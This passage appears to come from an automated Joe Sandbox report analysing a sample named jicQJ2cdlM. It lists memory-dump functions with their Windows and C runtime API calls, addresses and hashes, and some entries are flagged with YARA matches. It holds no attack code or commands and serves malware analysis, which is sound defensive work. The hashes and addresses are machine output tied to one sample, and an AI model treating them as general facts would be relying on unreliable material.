                                                                                    • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                    • Instruction Fuzzy Hash: 0DA14672E04B86DFD715CF38D8817EEBBE5EFA2350F18416DE5859B281D6388981C790
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                    • Instruction ID: 944ec9a8cfd15a85abea22ed7e483bbecdcf94b25d0ac16da2a86ed09b95ce29
                                                                                    • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                    • Instruction Fuzzy Hash: E8414771E00210AADB247BBBDC52ABF76A8EF4D334F14127BF418C6291D67C9D49826D
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                    • Instruction ID: d0f7318b816846d10d1d8655da6e4b9bd7209ce5b0ad1099b3af6e5d3e3b0687
                                                                                    • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                    • Instruction Fuzzy Hash: 39414D729001946FDB24AFBCAD46AFE37A4EF067B4F140635F818D61D1D73448C156A1
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,00A1049A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 00A16B71
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A16BFA
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A16C0C
                                                                                    • __freea.LIBCMT ref: 00A16C15
                                                                                      • Part of subcall function 00A1392E: RtlAllocateHeap.NTDLL(00000000,009EDAFC,00000000), ref: 00A13960
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: abd3ea47fc0e6ec547c6b6e60874e5e084d68c1577f3dfc99b50f136594fac3b
                                                                                    • Instruction ID: c5728886d8d942db41e4516f8650135eba6aece848ba1f98d3921e168dd5d2da
                                                                                    • Opcode Fuzzy Hash: abd3ea47fc0e6ec547c6b6e60874e5e084d68c1577f3dfc99b50f136594fac3b
                                                                                    • Instruction Fuzzy Hash: D331B032A0021AABDF259F65DC81EEE7BA5EF40714F144268FC05DB190E735CD90CBA0
                                                                                    APIs
                                                                                    • ShowWindow.USER32(00000005), ref: 00401FCB
                                                                                    • UpdateWindow.USER32 ref: 00401FD3
                                                                                    • ShowWindow.USER32(00000000), ref: 00401FE7
                                                                                    • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040204A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Show$MoveUpdate
                                                                                    • String ID:
                                                                                    • API String ID: 1339878773-0
                                                                                    • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                    • Instruction ID: 839b3a4605fc6fa716c5a1e9d0f595454ae31d99f498b0463e76923fa4e42aa6
                                                                                    • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                    • Instruction Fuzzy Hash: 83016531E006109BC7258F19ED48A267BAAFFD5712B14803AF40C972B1D7B1EC42CB9C
                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00429103
                                                                                      • Part of subcall function 00429050: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042907F
                                                                                      • Part of subcall function 00429050: ___AdjustPointer.LIBCMT ref: 0042909A
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00429118
                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429129
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00429151
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 737400349-0
                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                    • Instruction ID: c9ce71b37bf0ada561c0f38da96873ff120a9bb937dab02468c91de1f254ac1d
                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                    • Instruction Fuzzy Hash: F0018032200159BBDF12AE92DC46EEB3B69EF49758F444009FE0856121C33AEC71DBA8
                                                                                    APIs
                                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00A0936A
                                                                                      • Part of subcall function 00A092B7: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00A092E6
                                                                                      • Part of subcall function 00A092B7: ___AdjustPointer.LIBCMT ref: 00A09301
                                                                                    • _UnwindNestedFrames.LIBCMT ref: 00A0937F
                                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00A09390
                                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00A093B8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                    • String ID:
                                                                                    • API String ID: 737400349-0
                                                                                    • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                    • Instruction ID: 4bbf12538a4d8cd15dc5212856b56dca32c91f94b9ca1c994aeaefd64942625d
                                                                                    • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                    • Instruction Fuzzy Hash: DA01177250014CBBDF125F95DD41EEB7B79EF98754F044008FE085A1A2C732E861EBA1
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue), ref: 00434F81
                                                                                    • GetLastError.KERNEL32(?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FCC), ref: 00434F8D
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434EF6,?,00000000,00000000,00000000,?,004351AE,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F9B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                    • Instruction ID: 0cc1d3989d4ca165353a689bafe11803c7becb77e2de78a39e4b2d1452c45288
                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                    • Instruction Fuzzy Hash: 2601FC366052226BC7214F69AC449A7B7D8AF8AFA1F251631F905D3240D724ED01CAE8
                                                                                    APIs
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00A1515D,00000000,00000000,00000000,00000000,?,00A15415,00000006,0044A378), ref: 00A151E8
                                                                                    • GetLastError.KERNEL32(?,00A1515D,00000000,00000000,00000000,00000000,?,00A15415,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,00A12233), ref: 00A151F4
                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00A1515D,00000000,00000000,00000000,00000000,?,00A15415,00000006,0044A378,0044A370,0044A378,00000000), ref: 00A15202
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 3177248105-0
                                                                                    • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                    • Instruction ID: c246c778a12836a7cb450834223fa8d1ca4f2f23096c4c0a9085d065290f6a19
                                                                                    • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                    • Instruction Fuzzy Hash: 4501883BA51622EBC7214F79AC44AD777A8AF86B61B210630F905D7141D730D941CAE4
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426168
                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042617C
                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426194
                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004261AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                    • String ID:
                                                                                    • API String ID: 78362717-0
                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                    • Instruction ID: b0d532a26f63f6046bced7af3b1e02d5ba17ec3ebf316f442b0a79b2244c41dd
                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                    • Instruction Fuzzy Hash: 3F01F232700120ABCF16AE569811AFF779AAF90354F41001BFC11A7282CA34FD2192A8
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00A063CF
                                                                                    • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00A063E3
                                                                                    • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00A063FB
                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A06413
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                    • String ID:
                                                                                    • API String ID: 78362717-0
                                                                                    • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                    • Instruction ID: afae4a127851befdd6db8abd39ba56ae1d9147aca645b3c8300a4e20014a7a46
                                                                                    • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                    • Instruction Fuzzy Hash: B701493260052DA7DF11EF54E902AEF77AAEF84314F000011FD11AB2C2CA71ED2182E0
                                                                                    APIs
                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00A02BD1
                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00A02BEF
                                                                                      • Part of subcall function 009F86A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 009F86C8
                                                                                      • Part of subcall function 009F86A7: Hash.LIBCMT ref: 009F8708
                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00A02BF8
                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00A02C18
                                                                                      • Part of subcall function 009FF6FF: Hash.LIBCMT ref: 009FF711
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                    • String ID:
                                                                                    • API String ID: 2250070497-0
                                                                                    • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                    • Instruction ID: 69ee49cb2287ee41624dcd14219d5edbe746c162e0ba3d2657f590fc1dbd75b6
                                                                                    • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                    • Instruction Fuzzy Hash: D2118E72400708AFC715DF64C882ADAF7B8AF59320F004A6EE556C7192DB70F954CB50
                                                                                    APIs
                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 00A02BD1
                                                                                    • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 00A02BEF
                                                                                      • Part of subcall function 009F86A7: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 009F86C8
                                                                                      • Part of subcall function 009F86A7: Hash.LIBCMT ref: 009F8708
                                                                                    • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 00A02BF8
                                                                                    • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 00A02C18
                                                                                      • Part of subcall function 009FF6FF: Hash.LIBCMT ref: 009FF711
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                    • String ID:
                                                                                    • API String ID: 2250070497-0
                                                                                    • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                    • Instruction ID: 620ecf2e834d7bb1d8fcb6eae168f9b15f340481783de23e6072ca1a97b309fd
                                                                                    • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                    • Instruction Fuzzy Hash: 42012D72500608ABC715DF65D886EDAF7E8EF59310F008A2EE65687191DB70F954CB60
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040594B
                                                                                      • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405996
                                                                                    • __Getcoll.LIBCPMT ref: 004059A5
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 004059B5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                    • String ID:
                                                                                    • API String ID: 1836011271-0
                                                                                    • Opcode ID: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                                                    • Instruction ID: 9fd44fd2a3ed9f30d206a08b807669c32d498cc680062da3e3aec36702d876a7
                                                                                    • Opcode Fuzzy Hash: d3fd66d427a518a8327b3cb9cb74f6b8f9439b9a56478c2bf79d900e2c088ded
                                                                                    • Instruction Fuzzy Hash: 710135B1920209DFDB10EFA5C48279DBBB0FF00314F00813EE445AB281DB789984CF99
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 00404E8F
                                                                                      • Part of subcall function 0040BB6C: __EH_prolog3_GS.LIBCMT ref: 0040BB73
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EDA
                                                                                    • __Getcoll.LIBCPMT ref: 00404EE9
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404EF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                    • String ID:
                                                                                    • API String ID: 1836011271-0
                                                                                    • Opcode ID: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                                                    • Instruction ID: 32d9f0e851cf819fcbf451bbe4f834ae4b9dc531d1d0ebefa622e2c81c742f75
                                                                                    • Opcode Fuzzy Hash: 5c7f7b3e267c3cd93c70c270880bc3968e993bb5a96bedaf9e5824c89bd4bda4
                                                                                    • Instruction Fuzzy Hash: 9F015771910209DFEB10EFA5C48179DB7B0BF80314F00813EE445AB281DB789984CB99
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 009E50F6
                                                                                      • Part of subcall function 009EBDD3: __EH_prolog3_GS.LIBCMT ref: 009EBDDA
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 009E5141
                                                                                    • __Getcoll.LIBCPMT ref: 009E5150
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009E5160
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                    • String ID:
                                                                                    • API String ID: 1836011271-0
                                                                                    • Opcode ID: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                                                    • Instruction ID: a990ef1669ac24c9c92b8078f17ff0b009fb1c1f3aaeed179d5687b36a3ac250
                                                                                    • Opcode Fuzzy Hash: c834db4ee7f75f742bc9d38e4f24115f4df888d21d984597e93f0d8c665dfe3d
                                                                                    • Instruction Fuzzy Hash: B2014CB1D10649DFDB01EFA5C841B9DB7B4BF84311F158429E055AB282DBB49A84CB51
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 009E5BB2
                                                                                      • Part of subcall function 009EBDD3: __EH_prolog3_GS.LIBCMT ref: 009EBDDA
                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 009E5BFD
                                                                                    • __Getcoll.LIBCPMT ref: 009E5C0C
                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 009E5C1C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                    • String ID:
                                                                                    • API String ID: 1836011271-0
                                                                                    • Opcode ID: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                                                    • Instruction ID: a68cf090f2ee3c2857d6eb44d7eaadb4b7a94b26998a63e142681a4ca5f2c7a0
                                                                                    • Opcode Fuzzy Hash: 4b78d09c282b1f3f12f082a40fd3b66a20315af271f9a4a9c9543dffe2d9a537
                                                                                    • Instruction Fuzzy Hash: 91018C71C00749DFDB01EFA5C841B9DB7B4BF84310F108829E094AB282CBB59984CB91
                                                                                    APIs
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                    • String ID:
                                                                                    • API String ID: 3973403980-0
                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                    • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                    • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                                                    APIs
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 009FC190
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 009FC1A0
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 009FC1B0
                                                                                    • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 009FC1C4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Compare_exchange_acquire_4std::_
                                                                                    • String ID:
                                                                                    • API String ID: 3973403980-0
                                                                                    • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                    • Instruction ID: 51e04508c240f41d1dc3e837552c417ae8edf5902d9befd0c5f17e44f1f8cff8
                                                                                    • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                    • Instruction Fuzzy Hash: 6201C9BA50814DBBCF129E94DE429BD3B6ABF55350F24C412FE1884072D732C674AF92
                                                                                    APIs
                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                                                      • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                                                      • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                                                    • String ID:
                                                                                    • API String ID: 4284812201-0
                                                                                    • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                                                    • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                                                    • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                                                    • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                                                    APIs
                                                                                    • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                                                      • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                                                      • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                                                    • GetLastError.KERNEL32 ref: 00413561
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                                                      • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                    • String ID:
                                                                                    • API String ID: 1674182817-0
                                                                                    • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                    • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                                                    • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                    • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                                                    APIs
                                                                                    • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 009F1362
                                                                                      • Part of subcall function 009F0BD4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 009F0BF6
                                                                                      • Part of subcall function 009F0BD4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 009F0C17
                                                                                    • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 009F1375
                                                                                    • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 009F1381
                                                                                    • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 009F138A
                                                                                    Memory Dump Source
